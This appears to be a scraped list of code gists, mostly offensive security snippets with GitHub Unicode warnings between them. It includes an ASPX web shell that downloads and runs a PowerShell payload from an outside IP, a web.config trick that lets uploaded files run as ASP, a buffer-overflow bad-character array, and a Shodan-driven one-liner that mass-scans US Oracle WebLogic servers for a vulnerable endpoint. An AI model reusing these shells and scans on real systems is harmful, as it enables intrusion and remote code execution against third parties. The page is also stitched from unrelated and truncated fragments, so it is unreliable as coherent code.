This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$file = 'test.pdf'; | |
$filename = 'test.pdf'; /* Note: Always use .pdf at the end. */ | |
header('Content-type: application/pdf'); | |
header('Content-Disposition: inline; filename="' . $filename . '"'); | |
header('Content-Transfer-Encoding: binary'); | |
header('Content-Length: ' . filesize($file)); | |
header('Accept-Ranges: bytes'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| httprobe -p https:10000 -p https:1010 -p https:1085 -p https:11371 -p https:12443 -p https:1311 -p https:1414 -p https:14439 -p https:16080 -p https:1776 -p https:18091 -p https:18092 -p https:2031 -p https:20720 -p https:20790 -p https:2082 -p https:2087 -p https:2095 -p https:2096 -p https:21011 -p https:21012 -p https:21021 -p https:21022 -p https:2381 -p https:24465 -p https:2480 -p https:280 -p https:28017 -p https:300 -p https:3000 -p https:311 -p https:3128 -p https:3333 -p https:3702 -p https:4125 -p https:4243 -p https:4444 -p https:4567 -p https:4711 -p https:4712 -p https:4847 -p https:4993 -p https:5000 -p https:5010 -p https:5104 -p https:5108 -p https:5280 -p https:5357 -p https:5433 -p https:5800 -p https:591 -p https:593 -p https:6543 -p https:7000 -p https:7002 -p https:7396 -p https:7474 -p https:8000 -p https:8001 -p https:8008 -p https:8011 -p https:8014 -p https:8042 -p https:8069 -p https:8080 -p https:8081 -p https:8086 -p https:8088 -p https:8090 -p https:8091 -p https:81 -p https:81 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
badchars = ( | |
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" | |
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" | |
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" | |
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" | |
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" | |
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" | |
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" | |
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" | |
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
FS=$'\n' | |
old_pr=$(ps -eo command) | |
while true; do | |
new_pr=$(ps -eo command) | |
diff <(echo "$old_pr") <(echo "$new_pr") | grep [\<\>] | |
sleep 1 | |
old_pr=$new_pr | |
done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# http://ruby-doc.org/stdlib-2.0.0/libdoc/open-uri/rdoc/OpenURI.html | |
require 'open-uri' | |
# Go fetch the contents of a URL & store them as a String | |
response = open('http://www.example.com').read | |
# "Pretty prints" the result to look like a web page instead of one long string of HTML | |
URI.parse(response).class | |
# Print the contents of the website to the console |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//simple aspx shell to execute commands | |
<% | |
Set s = CreateObject("WScript.Shell") | |
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.8:1667/shell.ps1')") | |
o = cmd.StdOut.Readall() | |
Response.write(o) | |
%> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<configuration> | |
<system.webServer> | |
<handlers accessPolicy="Read, Script, Write"> | |
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
</handlers> | |
<security> | |
<requestFiltering> | |
<fileExtensions> | |
<remove fileExtension=".config" /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "<title>Generated hyper Link URLS</title>" >> $1-urls.html | |
cat $1 | while read urls; do | |
echo "<a href=${urls}>${urls}</a></br></br>" >> $1-urls.html | |
done |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
` | |
~/ | |
~ | |
×™× | |
___ | |
__ | |
_ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# this script was written by viss as a challenge from @random_robbie | |
# This one-liner replaces a fairly lengthy python script | |
# if you want to be walked through it, sign up for square cash, send $viss 20 dollars. Otherwise, flex your google fu! | |
# oh, ps: you need to pip install shodan, and then configure the shodan cli client by giving it your api key. | |
# then you're off to the races. | |
shodan search --fields ip_str --limit 1000 'product:"Oracle Weblogic" port:"7001" country:"US"' | sort -u | nmap -sT -Pn -n -oG - -iL - -p 7001 | grep open | awk '{print $2}' | xargs -I % -n 1 -P 30 bash -c 'RESULT=`curl -s -I -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko0100101 Firefox/54.0" -H "Connection":"close" -H "Accept-Language":"en-US -H en;q=0.5" -H "Accept":"text/html -H application/xhtml+xml -H application/xml;q=0.9 -H */*;q=0.8" -H "Upgrade-Insecure-Requests":"1" %:7001/ws_utc/config.do | egrep HTTP`; echo "%: $RESULT";' |